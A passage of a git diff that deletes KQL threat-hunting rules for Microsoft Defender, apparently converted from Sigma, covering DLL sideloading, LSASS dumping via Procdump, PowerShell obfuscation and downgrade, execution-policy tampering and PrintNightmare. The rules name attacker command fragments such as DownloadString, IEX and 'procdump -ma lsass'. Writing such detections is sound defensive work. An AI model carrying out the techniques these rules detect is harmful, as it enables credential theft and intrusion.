-| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
deleted file mode 100644
index 3c74a001..00000000
--- a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
-// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql b/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql
deleted file mode 100644
index 3d46efa4..00000000
--- a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/21
-// Level: high
-// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql
deleted file mode 100644
index 2d6086da..00000000
--- a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/10/30
-// Level: high
-// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
-This way we are also able to catch cases in which the attacker has renamed the procdump executable.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql b/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql
deleted file mode 100644
index 9b4a423d..00000000
--- a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis
-// Date: 2018/06/07
-// Level: high
-// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
-// Tags: attack.defense_evasion, attack.t1218.005
-DeviceProcessEvents
-| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql b/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql
deleted file mode 100644
index 3fce189b..00000000
--- a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql b/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql
deleted file mode 100644
index 4f76c2a3..00000000
--- a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/13
-// Level: high
-// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql b/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql
deleted file mode 100644
index 60343483..00000000
--- a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of LiveKD based on PE metadata or image name
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql b/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql
deleted file mode 100644
index 163f4b42..00000000
--- a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql b/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql
deleted file mode 100644
index b0914264..00000000
--- a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\mftrace.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql
deleted file mode 100644
index 327de0bf..00000000
--- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/08/02
-// Level: high
-// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql
deleted file mode 100644
index 46d0f2c6..00000000
--- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/08/01
-// Level: high
-// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_MsiExec_Masquerading.kql b/Defense Evasion/Potential_MsiExec_Masquerading.kql
deleted file mode 100644
index 7624082c..00000000
--- a/Defense Evasion/Potential_MsiExec_Masquerading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/11/14
-// Level: high
-// Description: Detects the execution of msiexec.exe from an uncommon directory
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql b/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql
deleted file mode 100644
index 5c519edc..00000000
--- a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql b/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql
deleted file mode 100644
index 39dcb31d..00000000
--- a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock
-// Date: 2021/10/07
-// Level: high
-// Description: Detects registry keys related to NetWire RAT
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\software\\NetWire"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql b/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql
deleted file mode 100644
index 1cd01f26..00000000
--- a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/17
-// Level: medium
-// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql b/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql
deleted file mode 100644
index de4b3519..00000000
--- a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects possible password spraying attempts using Dsacls
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql b/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql
deleted file mode 100644
index 720a8993..00000000
--- a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/27
-// Level: medium
-// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryValueSet" and RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations") and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql b/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql
deleted file mode 100644
index 5e923f8b..00000000
--- a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/30
-// Level: medium
-// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData startswith "URL:" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\CLASSES") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
deleted file mode 100644
index 617d3ee9..00000000
--- a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/17
-// Level: medium
-// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql b/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql b/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql
deleted file mode 100644
index 901cfc87..00000000
--- a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
-// Date: 2020/10/15
-// Level: high
-// Description: Detects the PowerShell command lines with special characters
-// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql b/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql
deleted file mode 100644
index 1a70acae..00000000
--- a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harish Segar (rule)
-// Date: 2020/03/20
-// Level: medium
-// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql
deleted file mode 100644
index ef414d97..00000000
--- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: medium
-// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql
deleted file mode 100644
index 6c46475e..00000000
--- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: high
-// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql b/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql
deleted file mode 100644
index 9ef6f39d..00000000
--- a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/08/25
-// Level: high
-// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
-This detection assumes that PowerShell commands are passed via the CommandLine.
-
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
deleted file mode 100644
index b0d3f76d..00000000
--- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: high
-// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
deleted file mode 100644
index 94151df4..00000000
--- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/09
-// Level: high
-// Description: Detects suspicious encoded character syntax often used for defense evasion
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql b/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
